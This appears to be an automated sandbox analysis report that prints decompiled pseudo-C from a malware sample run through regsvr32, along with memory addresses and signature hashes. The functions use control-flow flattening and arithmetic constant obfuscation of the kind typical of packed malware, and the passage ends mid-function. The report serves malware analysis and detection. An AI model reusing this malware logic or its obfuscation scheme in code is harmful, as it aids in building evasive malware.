                                                                                                                				intOrPtr _v40;
                                                                                                                				char _v44;
                                                                                                                				intOrPtr _v48;
                                                                                                                				intOrPtr _v52;
                                                                                                                				intOrPtr _v56;
                                                                                                                				intOrPtr _v60;
                                                                                                                				char _v68;
                                                                                                                				signed int _v72;
                                                                                                                				char _v76;
                                                                                                                				signed int _v80;
                                                                                                                				signed int _v84;
                                                                                                                				signed int _v88;
                                                                                                                				signed int _v92;
                                                                                                                				signed int _v96;
                                                                                                                				signed int _v100;
                                                                                                                				signed int _v104;
                                                                                                                				signed int _v108;
                                                                                                                				signed int _v112;
                                                                                                                				signed int _v116;
                                                                                                                				signed int _v120;
                                                                                                                				signed int _v124;
                                                                                                                				signed int _v128;
                                                                                                                				signed int _v132;
                                                                                                                				signed int _v136;
                                                                                                                				signed int _v140;
                                                                                                                				signed int _v144;
                                                                                                                				signed int _v148;
                                                                                                                				signed int _v152;
                                                                                                                				signed int _v156;
                                                                                                                				signed int _v160;
                                                                                                                				signed int _v164;
                                                                                                                				void* __ecx;
                                                                                                                				void* _t207;
                                                                                                                				void* _t222;
                                                                                                                				void* _t224;
                                                                                                                				signed int _t225;
                                                                                                                				char* _t227;
                                                                                                                				signed int _t228;
                                                                                                                				void* _t233;
                                                                                                                				intOrPtr _t240;
                                                                                                                				intOrPtr* _t243;
                                                                                                                				void* _t245;
                                                                                                                				signed int _t247;
                                                                                                                				char _t249;
                                                                                                                				intOrPtr _t268;
                                                                                                                				intOrPtr* _t270;
                                                                                                                				signed int _t271;
                                                                                                                				signed int _t272;
                                                                                                                				signed int _t273;
                                                                                                                				void* _t275;
                                                                                                                				void* _t276;
                                                                                                                
                                                                                                                				_t243 = _a4;
                                                                                                                				_t270 = _a8;
                                                                                                                				_push(_a12);
                                                                                                                				_push(_t270);
                                                                                                                				_push(_t243);
                                                                                                                				_push(__edx);
                                                                                                                				E001AC98A(_t207);
                                                                                                                				_v60 = 0x79b68b;
                                                                                                                				_t268 = 0;
                                                                                                                				_v56 = 0xb1fe25;
                                                                                                                				_t276 = _t275 + 0x14;
                                                                                                                				_v52 = 0;
                                                                                                                				_v48 = 0;
                                                                                                                				_t245 = 0x242b324;
                                                                                                                				_v136 = 0xb38636;
                                                                                                                				_v136 = _v136 << 2;
                                                                                                                				_t271 = 0x18;
                                                                                                                				_v136 = _v136 * 0x13;
                                                                                                                				_v136 = _v136 ^ 0x354bd808;
                                                                                                                				_v112 = 0x75a3bb;
                                                                                                                				_v112 = _v112 ^ 0xd727154a;
                                                                                                                				_v112 = _v112 ^ 0xd752b6e1;
                                                                                                                				_v84 = 0x8762a3;
                                                                                                                				_v84 = _v84 / _t271;
                                                                                                                				_v84 = _v84 ^ 0x0009cb2b;
                                                                                                                				_v100 = 0x8a2833;
                                                                                                                				_t272 = 0x75;
                                                                                                                				_v100 = _v100 * 0x52;
                                                                                                                				_v100 = _v100 ^ 0x2c4d8f9d;
                                                                                                                				_v128 = 0xd3bfc0;
                                                                                                                				_v128 = _v128 | 0x134c25e2;
                                                                                                                				_v128 = _v128 * 3;
                                                                                                                				_v128 = _v128 ^ 0x3b9eef4b;
                                                                                                                				_v116 = 0xf3fdea;
                                                                                                                				_v116 = _v116 + 0xffff23cf;
                                                                                                                				_v116 = _v116 ^ 0x3255c10c;
                                                                                                                				_v116 = _v116 ^ 0x32af19b4;
                                                                                                                				_v152 = 0x5ddc76;
                                                                                                                				_v152 = _v152 >> 6;
                                                                                                                				_v152 = _v152 / _t272;
                                                                                                                				_v152 = _v152 | 0x262df334;
                                                                                                                				_v152 = _v152 ^ 0x2622e53d;
                                                                                                                				_v160 = 0xe8f531;
                                                                                                                				_v160 = _v160 >> 0xe;
                                                                                                                				_v160 = _v160 ^ 0xb4500013;
                                                                                                                				_v160 = _v160 * 0x77;
                                                                                                                				_v160 = _v160 ^ 0xd13cdb6d;
                                                                                                                				_v96 = 0xf013a7;
                                                                                                                				_v96 = _v96 * 0x31;
                                                                                                                				_v96 = _v96 ^ 0x2dfd3eec;
                                                                                                                				_v80 = 0x3a7336;
                                                                                                                				_v80 = _v80 | 0x0708e64f;
                                                                                                                				_v80 = _v80 ^ 0x0733b505;
                                                                                                                				_v92 = 0x53fd8;
                                                                                                                				_v92 = _v92 + 0xffffd9ef;
                                                                                                                				_v92 = _v92 ^ 0x000ce5b4;
                                                                                                                				_v120 = 0xebbd57;
                                                                                                                				_v120 = _v120 | 0xbe7bbe8e;
                                                                                                                				_v120 = _v120 ^ 0xbefe083d;
                                                                                                                				_v88 = 0x249d68;
                                                                                                                				_v88 = _v88 | 0x3d36917a;
                                                                                                                				_v88 = _v88 ^ 0x3d3dc3f9;
                                                                                                                				_v132 = 0x4d07e8;
                                                                                                                				_v132 = _v132 << 5;
                                                                                                                				_v132 = _v132 << 7;
                                                                                                                				_v132 = _v132 ^ 0xd073c10f;
                                                                                                                				_v140 = 0xba92b3;
                                                                                                                				_v140 = _v140 >> 0xc;
                                                                                                                				_v140 = _v140 << 0xf;
                                                                                                                				_v140 = _v140 ^ 0x05d0d282;
                                                                                                                				_v144 = 0xead0c7;
                                                                                                                				_v144 = _v144 << 2;
                                                                                                                				_t273 = 0x30;
                                                                                                                				_v144 = _v144 / _t273;
                                                                                                                				_v144 = _v144 ^ 0x00184719;
                                                                                                                				_v108 = 0x41d9d7;
                                                                                                                				_v108 = _v108 ^ 0x2bd481eb;
                                                                                                                				_v108 = _v108 ^ 0x2b92631e;
                                                                                                                				_v104 = 0xceffed;
                                                                                                                				_v104 = _v104 << 8;
                                                                                                                				_v104 = _v104 ^ 0xceff314f;
                                                                                                                				_v164 = 0x28ec07;
                                                                                                                				_v164 = _v164 + 0xffff32f8;
                                                                                                                				_v164 = _v164 + 0xffff53e0;
                                                                                                                				_v164 = _v164 + 0xffff9863;
                                                                                                                				_v164 = _v164 ^ 0x002bb535;
                                                                                                                				_v156 = 0x73fca4;
                                                                                                                				_v156 = _v156 >> 5;
                                                                                                                				_v156 = _v156 + 0x96c1;
                                                                                                                				_v156 = _v156 + 0xe5d2;
                                                                                                                				_v156 = _v156 ^ 0x0005e78b;
                                                                                                                				_v148 = 0x4a0a40;
                                                                                                                				_v148 = _v148 + 0x5892;
                                                                                                                				_v148 = _v148 << 2;
                                                                                                                				_v148 = _v148 ^ 0x012de197;
                                                                                                                				_v124 = 0x519675;
                                                                                                                				_v124 = _v124 ^ 0x8890b8b6;
                                                                                                                				_v124 = _v124 ^ 0x88c54f1f;
                                                                                                                				L1:
                                                                                                                				while(_t245 != 0x1d5aa6) {
                                                                                                                					if(_t245 == 0x242b324) {
                                                                                                                						_t245 = 0x652537e;
                                                                                                                						continue;
                                                                                                                					}
                                                                                                                					if(_t245 == 0x51985bf) {
                                                                                                                						_t247 = _v80;
                                                                                                                						_t224 = E001BDF2B(_t247,  &_v44, _v92,  &_v16, _v120, _v88);
                                                                                                                						_t276 = _t276 + 0x10;
                                                                                                                						if(_t224 != 0) {
                                                                                                                							_push(_t247);
                                                                                                                							_t240 = E001A303A(_t247, _v40);
                                                                                                                							_t276 = _t276 + 0xc;
                                                                                                                							 *_t270 = _t240;
                                                                                                                							if(_t240 != 0) {
                                                                                                                								E001BFD42(_v40, _v104, _v44, _v164,  *_t270, _v156);
                                                                                                                								_t276 = _t276 + 0x10;
                                                                                                                								 *((intOrPtr*)(_t270 + 4)) = _v40;
                                                                                                                								_t268 = 1;
                                                                                                                							}
                                                                                                                						}
                                                                                                                						_t245 = 0xa9973c9;
                                                                                                                						continue;
                                                                                                                					}
                                                                                                                					if(_t245 == 0x652537e) {
                                                                                                                						_t225 =  *((intOrPtr*)(_t243 + 4));
                                                                                                                						_t249 =  *_t243;
                                                                                                                						_v72 = _t225;
                                                                                                                						_v76 = _t249;
                                                                                                                						_t227 = _t225 - 1 + _t249;
                                                                                                                						while(_t227 > _t249) {
                                                                                                                							if( *_t227 == 0) {
                                                                                                                								break;
                                                                                                                							}
                                                                                                                							_t227 = _t227 - 1;
                                                                                                                						}
                                                                                                                						_t228 = _t227 - _t249;
                                                                                                                						_v72 = _t228;
                                                                                                                						if(_t228 == 0) {
                                                                                                                							L16:
                                                                                                                							_t245 = 0xcc86d59;
                                                                                                                							continue;
                                                                                                                						}
                                                                                                                						while(_v72 % _v112 != _v136) {
                                                                                                                							_t179 =  &_v72;
                                                                                                                							 *_t179 = _v72 - 1;
                                                                                                                							if( *_t179 != 0) {
                                                                                                                								continue;
                                                                                                                							}
                                                                                                                							goto L16;
                                                                                                                						}
                                                                                                                						goto L16;
                                                                                                                					}
                                                                                                                					if(_t245 == 0xa9973c9) {
                                                                                                                						E001B17D2(_v148, _v124, _v68);
                                                                                                                						L28:
                                                                                                                						return _t268;
                                                                                                                					}
                                                                                                                					if(_t245 != 0xcc86d59) {
                                                                                                                						L25:
                                                                                                                						if(_t245 != 0xd49aba2) {
                                                                                                                							continue;
                                                                                                                						}
                                                                                                                						goto L28;
                                                                                                                					}
                                                                                                                					_t233 = E001BA916(_v84, _v100, _v128,  &_v68, _v116,  &_v76);
                                                                                                                					_t276 = _t276 + 0x10;
                                                                                                                					if(_t233 == 0) {
                                                                                                                						goto L28;
                                                                                                                					}
                                                                                                                					_t245 = 0x1d5aa6;
                                                                                                                				}
                                                                                                                				_t222 = E001BCFA0( &_v44,  &_v68, _v160, _v96);
                                                                                                                				_t276 = _t276 + 0xc;
                                                                                                                				if(_t222 == 0) {
                                                                                                                					_t245 = 0xa9973c9;
                                                                                                                					goto L25;
                                                                                                                				}
                                                                                                                				_t245 = 0x51985bf;
                                                                                                                				goto L1;
                                                                                                                			}


                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 6s:$="&$@J
                                                                                                                • API String ID: 0-1291149906
                                                                                                                • Opcode ID: 721145b223498ec0f1a49e0d4607bde14810ad7390df8733dc3e63dc860cbfd8
                                                                                                                • Instruction ID: eafb7d50890a472cafb186c1e9aad026784198d3484158ad5de1f44be68ab2fb
                                                                                                                • Opcode Fuzzy Hash: 721145b223498ec0f1a49e0d4607bde14810ad7390df8733dc3e63dc860cbfd8
                                                                                                                • Instruction Fuzzy Hash: D4B10EB15083819FD768CF25C98A95BBBE1FB85348F50491EF69686220D7B1CA49CF83
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 97%
                                                                                                                			E001ACDE0() {
                                                                                                                				char _v520;
                                                                                                                				char _v1040;
                                                                                                                				signed int _v1044;
                                                                                                                				signed int _v1048;
                                                                                                                				signed int _v1052;
                                                                                                                				signed int _v1056;
                                                                                                                				signed int _v1060;
                                                                                                                				signed int _v1064;
                                                                                                                				signed int _v1068;
                                                                                                                				signed int _v1072;
                                                                                                                				signed int _v1076;
                                                                                                                				signed int _v1080;
                                                                                                                				signed int _v1084;
                                                                                                                				signed int _v1088;
                                                                                                                				signed int _v1092;
                                                                                                                				signed int _v1096;
                                                                                                                				signed int _v1100;
                                                                                                                				signed int _v1104;
                                                                                                                				signed int _v1108;
                                                                                                                				signed int _v1112;
                                                                                                                				signed int _v1116;
                                                                                                                				signed int _v1120;
                                                                                                                				signed int _v1124;
                                                                                                                				signed int _v1128;
                                                                                                                				signed int _v1132;
                                                                                                                				signed int _v1136;
                                                                                                                				signed int _v1140;
                                                                                                                				signed int _v1144;
                                                                                                                				signed int _v1148;
                                                                                                                				signed int _v1152;
                                                                                                                				void* _t248;
                                                                                                                				short* _t255;
                                                                                                                				intOrPtr _t257;
                                                                                                                				void* _t261;
                                                                                                                				void* _t264;
                                                                                                                				intOrPtr _t266;
                                                                                                                				signed int _t287;
                                                                                                                				signed int _t288;
                                                                                                                				signed int* _t291;
                                                                                                                
                                                                                                                				_t291 =  &_v1152;
                                                                                                                				_v1108 = 0xa5a072;
                                                                                                                				_v1108 = _v1108 >> 0x10;
                                                                                                                				_t264 = 0x58e823f;
                                                                                                                				_t287 = 0x23;
                                                                                                                				_v1108 = _v1108 / _t287;
                                                                                                                				_v1108 = _v1108 ^ 0x00079851;
                                                                                                                				_v1140 = 0xa745f3;
                                                                                                                				_v1140 = _v1140 << 2;
                                                                                                                				_v1140 = _v1140 ^ 0xe4542542;
                                                                                                                				_v1140 = _v1140 << 8;
                                                                                                                				_v1140 = _v1140 ^ 0xc93c6e99;
                                                                                                                				_v1088 = 0x47d96d;
                                                                                                                				_v1088 = _v1088 ^ 0x96571a65;
                                                                                                                				_v1088 = _v1088 + 0xffffc45e;
                                                                                                                				_v1088 = _v1088 ^ 0x961dce68;
                                                                                                                				_v1152 = 0xc2e892;
                                                                                                                				_v1152 = _v1152 << 0xf;
                                                                                                                				_v1152 = _v1152 << 0xb;
                                                                                                                				_v1152 = _v1152 >> 4;
                                                                                                                				_v1152 = _v1152 ^ 0x048232a4;
                                                                                                                				_v1116 = 0x5bc054;
                                                                                                                				_v1116 = _v1116 * 0x72;
                                                                                                                				_v1116 = _v1116 * 0x45;
                                                                                                                				_v1116 = _v1116 ^ 0x0335fcbc;
                                                                                                                				_v1124 = 0xb9518;
                                                                                                                				_v1124 = _v1124 * 0x35;
                                                                                                                				_v1124 = _v1124 >> 2;
                                                                                                                				_v1124 = _v1124 + 0xffff1680;
                                                                                                                				_v1124 = _v1124 ^ 0x009dd958;
                                                                                                                				_v1112 = 0x188cb2;
                                                                                                                				_v1112 = _v1112 * 0x59;
                                                                                                                				_v1112 = _v1112 << 8;
                                                                                                                				_v1112 = _v1112 ^ 0x88e416c3;
                                                                                                                				_v1064 = 0x2a62b3;
                                                                                                                				_v1064 = _v1064 + 0x1903;
                                                                                                                				_v1064 = _v1064 ^ 0x002036c0;
                                                                                                                				_v1044 = 0xed530e;
                                                                                                                				_v1044 = _v1044 | 0x424246f7;
                                                                                                                				_v1044 = _v1044 ^ 0x42e11766;
                                                                                                                				_v1144 = 0x94ec6d;
                                                                                                                				_v1144 = _v1144 * 0x51;
                                                                                                                				_v1144 = _v1144 << 0x10;
                                                                                                                				_v1144 = _v1144 ^ 0x2672da44;
                                                                                                                				_v1144 = _v1144 ^ 0xe80f2240;
                                                                                                                				_v1100 = 0x4d77b6;
                                                                                                                				_v1100 = _v1100 + 0x3e24;
                                                                                                                				_v1100 = _v1100 << 0xa;
                                                                                                                				_v1100 = _v1100 ^ 0x36d3b252;
                                                                                                                				_v1056 = 0xddd661;
                                                                                                                				_v1056 = _v1056 >> 0xc;
                                                                                                                				_v1056 = _v1056 ^ 0x00045a8e;
                                                                                                                				_v1092 = 0xb1c0a8;
                                                                                                                				_v1092 = _v1092 >> 0xe;
                                                                                                                				_v1092 = _v1092 | 0xd99f1716;
                                                                                                                				_v1092 = _v1092 ^ 0xd99b4737;
                                                                                                                				_v1136 = 0xb48c27;
                                                                                                                				_v1136 = _v1136 + 0xfffff076;
                                                                                                                				_v1136 = _v1136 | 0x057053e0;
                                                                                                                				_v1136 = _v1136 + 0xffffe18d;
                                                                                                                				_v1136 = _v1136 ^ 0x05f9701b;
                                                                                                                				_v1048 = 0x33d44f;
                                                                                                                				_v1048 = _v1048 * 0x55;
                                                                                                                				_v1048 = _v1048 ^ 0x113761e1;
                                                                                                                				_v1132 = 0x6ed9b3;
                                                                                                                				_v1132 = _v1132 + 0xffff3a36;
                                                                                                                				_v1132 = _v1132 + 0xfffff888;
                                                                                                                				_v1132 = _v1132 | 0x6613894a;
                                                                                                                				_v1132 = _v1132 ^ 0x667e2fc2;
                                                                                                                				_v1072 = 0x16e957;
                                                                                                                				_v1072 = _v1072 ^ 0x6da3d916;
                                                                                                                				_v1072 = _v1072 ^ 0x6db7d6a4;
                                                                                                                				_v1096 = 0x537b0f;
                                                                                                                				_v1096 = _v1096 + 0x1263;
                                                                                                                				_t288 = 0xf;
                                                                                                                				_v1096 = _v1096 * 0x78;
                                                                                                                				_v1096 = _v1096 ^ 0x2724813f;
                                                                                                                				_v1148 = 0xc61690;
                                                                                                                				_v1148 = _v1148 ^ 0x1cf8353e;
                                                                                                                				_v1148 = _v1148 | 0x2f326404;
                                                                                                                				_v1148 = _v1148 ^ 0xf9102228;
                                                                                                                				_v1148 = _v1148 ^ 0xc62f3d14;
                                                                                                                				_v1104 = 0x7fc141;
                                                                                                                				_v1104 = _v1104 | 0xaf92f3d7;
                                                                                                                				_v1104 = _v1104 ^ 0xaff9034c;
                                                                                                                				_v1080 = 0x4870ca;
                                                                                                                				_v1080 = _v1080 * 0x3d;
                                                                                                                				_v1080 = _v1080 ^ 0x114e5793;
                                                                                                                				_v1068 = 0x7f9ab0;
                                                                                                                				_v1068 = _v1068 << 0xf;
                                                                                                                				_v1068 = _v1068 ^ 0xcd53ab4f;
                                                                                                                				_v1076 = 0x85c708;
                                                                                                                				_v1076 = _v1076 ^ 0x1235911e;
                                                                                                                				_v1076 = _v1076 ^ 0x12b8a192;
                                                                                                                				_v1128 = 0x79f20c;
                                                                                                                				_v1128 = _v1128 / _t288;
                                                                                                                				_v1128 = _v1128 << 0xb;
                                                                                                                				_v1128 = _v1128 * 0x3b;
                                                                                                                				_v1128 = _v1128 ^ 0xfd3bc06c;
                                                                                                                				_v1052 = 0x5690ae;
                                                                                                                				_v1052 = _v1052 + 0xffff34ef;
                                                                                                                				_v1052 = _v1052 ^ 0x0052cbf9;
                                                                                                                				_v1120 = 0xb8f20d;
                                                                                                                				_v1120 = _v1120 + 0x9a25;
                                                                                                                				_v1120 = _v1120 >> 2;
                                                                                                                				_v1120 = _v1120 + 0x9c1e;
                                                                                                                				_v1120 = _v1120 ^ 0x00256f46;
                                                                                                                				_v1060 = 0xa999ad;
                                                                                                                				_v1060 = _v1060 << 0xc;
                                                                                                                				_v1060 = _v1060 ^ 0x999b604f;
                                                                                                                				_v1084 = 0xcb8c6b;
                                                                                                                				_v1084 = _v1084 | 0xfbfafbf7;
                                                                                                                				_v1084 = _v1084 ^ 0xfbfc03d3;
                                                                                                                				while(_t264 != 0x45008f) {
                                                                                                                					if(_t264 == 0x18af684) {
                                                                                                                						E001AC4E5();
                                                                                                                						L8:
                                                                                                                						_t264 = 0x45008f;
                                                                                                                						continue;
                                                                                                                					}
                                                                                                                					if(_t264 == 0x239027f) {
                                                                                                                						_t255 = E001A2263( &_v1040, _v1068, _v1076, _v1128);
                                                                                                                						__eflags = 0;
                                                                                                                						 *_t255 = 0;
                                                                                                                						return E001A35B1(_v1052,  &_v1040, _v1120, _v1060, _v1084);
                                                                                                                					}
                                                                                                                					if(_t264 == 0x58e823f) {
                                                                                                                						_t257 =  *0x1c4c10; // 0x67d820
                                                                                                                						__eflags =  *((intOrPtr*)(_t257 + 0x414));
                                                                                                                						_t264 =  !=  ? 0xd9adec8 : 0x18af684;
                                                                                                                						continue;
                                                                                                                					}
                                                                                                                					if(_t264 == 0xc8ea48b) {
                                                                                                                						E001C1A0A(_v1132, _v1072, _v1096, _v1148,  &_v520);
                                                                                                                						_t261 = E001A4B40( &_v520, _v1104, __eflags,  &_v1040, _v1080);
                                                                                                                						_t291 =  &(_t291[5]);
                                                                                                                						_t264 = 0x239027f;
                                                                                                                						continue;
                                                                                                                					}
                                                                                                                					if(_t264 != 0xd9adec8) {
                                                                                                                						L13:
                                                                                                                						__eflags = _t264 - 0xa147fec;
                                                                                                                						if(__eflags != 0) {
                                                                                                                							continue;
                                                                                                                						}
                                                                                                                						return _t261;
                                                                                                                					}
                                                                                                                					_t261 = E001BD15E();
                                                                                                                					goto L8;
                                                                                                                				}
                                                                                                                				_push(_v1112);
                                                                                                                				_push(0x1a109c);
                                                                                                                				_push(_v1124);
                                                                                                                				_t248 = E001BF5D9(_v1152, _v1116, __eflags);
                                                                                                                				_t266 =  *0x1c4c10; // 0x67d820
                                                                                                                				_t221 = _t266 + 4; // 0x67d824
                                                                                                                				__eflags = _t266 + 0x20c;
                                                                                                                				E001B8EB3(_t221, _t266 + 0x20c, _v1064, _v1152, _v1044,  &_v1040, _v1144, _t248, _v1100);
                                                                                                                				E001BF94B(_t248, _v1056, _v1092, _v1136, _v1048);
                                                                                                                				_t291 =  &(_t291[0xd]);
                                                                                                                				_t264 = 0xc8ea48b;
                                                                                                                				goto L13;
                                                                                                                			}










































                                                                                                                0x001ad128
                                                                                                                0x001ad12d
                                                                                                                0x001ad135
                                                                                                                0x001ad13d
                                                                                                                0x001ad145
                                                                                                                0x001ad14d
                                                                                                                0x001ad157
                                                                                                                0x001ad1f2
                                                                                                                0x001ad18a
                                                                                                                0x001ad18a
                                                                                                                0x00000000
                                                                                                                0x001ad18a
                                                                                                                0x001ad163
                                                                                                                0x001ad292
                                                                                                                0x001ad29b
                                                                                                                0x001ad2a8
                                                                                                                0x00000000
                                                                                                                0x001ad2bb
                                                                                                                0x001ad16f
                                                                                                                0x001ad1d4
                                                                                                                0x001ad1db
                                                                                                                0x001ad1e2
                                                                                                                0x00000000
                                                                                                                0x001ad1e2
                                                                                                                0x001ad177
                                                                                                                0x001ad1a6
                                                                                                                0x001ad1c2
                                                                                                                0x001ad1c7
                                                                                                                0x001ad1ca
                                                                                                                0x00000000
                                                                                                                0x001ad1ca
                                                                                                                0x001ad17b
                                                                                                                0x001ad271
                                                                                                                0x001ad271
                                                                                                                0x001ad277
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x001ad277
                                                                                                                0x001ad185
                                                                                                                0x00000000
                                                                                                                0x001ad185
                                                                                                                0x001ad1f9
                                                                                                                0x001ad1fd
                                                                                                                0x001ad202
                                                                                                                0x001ad20e
                                                                                                                0x001ad238
                                                                                                                0x001ad23e
                                                                                                                0x001ad241
                                                                                                                0x001ad247
                                                                                                                0x001ad264
                                                                                                                0x001ad269
                                                                                                                0x001ad26c
                                                                                                                0x00000000

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $>$B%T$Fo%
                                                                                                                • API String ID: 0-816726572
                                                                                                                • Opcode ID: 0df44814e7ccc5c14cb1cd2a7c828f0ee2316162a77d8dfb605703c0ac176198
                                                                                                                • Instruction ID: 9a4b189e88f06527d3e0985461ea1b5a30452d4f0fdbd70ce268b1d68936b72e
                                                                                                                • Opcode Fuzzy Hash: 0df44814e7ccc5c14cb1cd2a7c828f0ee2316162a77d8dfb605703c0ac176198
                                                                                                                • Instruction Fuzzy Hash: BBC11DB10083808FC768CF25D58A91FBBF1BBD5748F504A1DF6A696260D3B1CA49CF86
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 94%
                                                                                                                			E001B2783(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                				char _v60;
                                                                                                                				signed int _v64;
                                                                                                                				signed int _v68;
                                                                                                                				signed int _v72;
                                                                                                                				signed int _v76;
                                                                                                                				signed int _v80;
                                                                                                                				signed int _v84;
                                                                                                                				signed int _v88;
                                                                                                                				signed int _v92;
                                                                                                                				signed int _v96;
                                                                                                                				signed int _v100;
                                                                                                                				signed int _v104;
                                                                                                                				signed int _v108;
                                                                                                                				signed int _v112;
                                                                                                                				signed int _v116;
                                                                                                                				signed int _v120;
                                                                                                                				signed int _v124;
                                                                                                                				signed int _v128;
                                                                                                                				void* _t161;
                                                                                                                				void* _t177;
                                                                                                                				void* _t178;
                                                                                                                				void* _t183;
                                                                                                                				void* _t184;
                                                                                                                				signed int _t185;
                                                                                                                				signed int _t186;
                                                                                                                				signed int _t187;
                                                                                                                				signed int _t188;
                                                                                                                				signed int _t189;
                                                                                                                				void* _t192;
                                                                                                                				void* _t221;
                                                                                                                				void* _t223;
                                                                                                                				void* _t224;
                                                                                                                
                                                                                                                				_t220 = _a16;
                                                                                                                				_push(_a16);
                                                                                                                				_push(_a12);
                                                                                                                				_push(_a8);
                                                                                                                				_push(_a4);
                                                                                                                				_push(__edx);
                                                                                                                				_push(__ecx);
                                                                                                                				E001AC98A(_t161);
                                                                                                                				_v104 = 0xf274f7;
                                                                                                                				_t224 = _t223 + 0x18;
                                                                                                                				_v104 = _v104 << 1;
                                                                                                                				_v104 = _v104 << 4;
                                                                                                                				_t221 = 0;
                                                                                                                				_v104 = _v104 ^ 0x1e43e0d6;
                                                                                                                				_t192 = 0x6023d69;
                                                                                                                				_v84 = 0x535c0c;
                                                                                                                				_t185 = 0x57;
                                                                                                                				_v84 = _v84 / _t185;
                                                                                                                				_v84 = _v84 ^ 0x00073351;
                                                                                                                				_v108 = 0x11c640;
                                                                                                                				_t186 = 0x72;
                                                                                                                				_v108 = _v108 * 0x5a;
                                                                                                                				_v108 = _v108 + 0x565;
                                                                                                                				_v108 = _v108 ^ 0x06349e91;
                                                                                                                				_v120 = 0x83f247;
                                                                                                                				_v120 = _v120 * 0x6a;
                                                                                                                				_v120 = _v120 ^ 0xce6fc75b;
                                                                                                                				_v120 = _v120 << 0xa;
                                                                                                                				_v120 = _v120 ^ 0x365e4d2d;
                                                                                                                				_v124 = 0xf28d99;
                                                                                                                				_v124 = _v124 + 0xffff2c6b;
                                                                                                                				_v124 = _v124 >> 0xd;
                                                                                                                				_v124 = _v124 << 7;
                                                                                                                				_v124 = _v124 ^ 0x0001a022;
                                                                                                                				_v100 = 0x8b20ab;
                                                                                                                				_v100 = _v100 + 0xffff9ff6;
                                                                                                                				_v100 = _v100 << 0xe;
                                                                                                                				_v100 = _v100 ^ 0xb02f0bcc;
                                                                                                                				_v112 = 0xdcc3b5;
                                                                                                                				_v112 = _v112 >> 0xa;
                                                                                                                				_v112 = _v112 + 0xffff47e2;
                                                                                                                				_v112 = _v112 ^ 0xfff6fb09;
                                                                                                                				_v88 = 0xae0fa2;
                                                                                                                				_v88 = _v88 * 0x4b;
                                                                                                                				_v88 = _v88 ^ 0x32ff48f5;
                                                                                                                				_v92 = 0x9ce572;
                                                                                                                				_v92 = _v92 / _t186;
                                                                                                                				_v92 = _v92 ^ 0x00033cd4;
                                                                                                                				_v116 = 0xdf3c17;
                                                                                                                				_v116 = _v116 | 0x576f0a38;
                                                                                                                				_t187 = 0x24;
                                                                                                                				_v116 = _v116 / _t187;
                                                                                                                				_v116 = _v116 ^ 0x02769a92;
                                                                                                                				_v128 = 0x8c9df7;
                                                                                                                				_v128 = _v128 + 0x8c9;
                                                                                                                				_v128 = _v128 + 0xb2c5;
                                                                                                                				_v128 = _v128 + 0x6261;
                                                                                                                				_v128 = _v128 ^ 0x008eac0f;
                                                                                                                				_v96 = 0xd8f30c;
                                                                                                                				_v96 = _v96 ^ 0x8d261108;
                                                                                                                				_v96 = _v96 ^ 0x8df0225d;
                                                                                                                				_v72 = 0x9d525a;
                                                                                                                				_v72 = _v72 | 0xf0920ac5;
                                                                                                                				_v72 = _v72 ^ 0xf09e2456;
                                                                                                                				_v76 = 0x4eac0f;
                                                                                                                				_t188 = 0x22;
                                                                                                                				_v76 = _v76 * 0x70;
                                                                                                                				_v76 = _v76 ^ 0x226c3ba3;
                                                                                                                				_v80 = 0xaa28e5;
                                                                                                                				_v80 = _v80 / _t188;
                                                                                                                				_v80 = _v80 ^ 0x0003e0ed;
                                                                                                                				_v64 = 0x557db1;
                                                                                                                				_v64 = _v64 ^ 0xab82898c;
                                                                                                                				_v64 = _v64 ^ 0xabd85123;
                                                                                                                				_v68 = 0x6b1311;
                                                                                                                				_t189 = 0x2d;
                                                                                                                				_v68 = _v68 / _t189;
                                                                                                                				_v68 = _v68 ^ 0x000168b9;
                                                                                                                				do {
                                                                                                                					while(_t192 != 0x2cc8358) {
                                                                                                                						if(_t192 == 0x4876999) {
                                                                                                                							_t178 = E001B6D3A( &_v60, _t220 + 0x14, _v72, _v76, _v80);
                                                                                                                							_t224 = _t224 + 0xc;
                                                                                                                							__eflags = _t178;
                                                                                                                							if(__eflags != 0) {
                                                                                                                								_t192 = 0x555feb3;
                                                                                                                								continue;
                                                                                                                							}
                                                                                                                						} else {
                                                                                                                							if(_t192 == 0x555feb3) {
                                                                                                                								__eflags = E001AA903(_v64, _t220 + 0x24, __eflags, _v68,  &_v60);
                                                                                                                								_t221 =  !=  ? 1 : _t221;
                                                                                                                							} else {
                                                                                                                								if(_t192 == 0x6023d69) {
                                                                                                                									_t192 = 0x628e9a9;
                                                                                                                									continue;
                                                                                                                								} else {
                                                                                                                									if(_t192 == 0x628e9a9) {
                                                                                                                										E001A6DD9( &_v60, _v104, _v84, _a8, _v108);
                                                                                                                										_t224 = _t224 + 0xc;
                                                                                                                										_t192 = 0x2cc8358;
                                                                                                                										continue;
                                                                                                                									} else {
                                                                                                                										if(_t192 == 0x7251359) {
                                                                                                                											_t183 = E001B6D3A( &_v60, _t220 + 4, _v112, _v88, _v92);
                                                                                                                											_t224 = _t224 + 0xc;
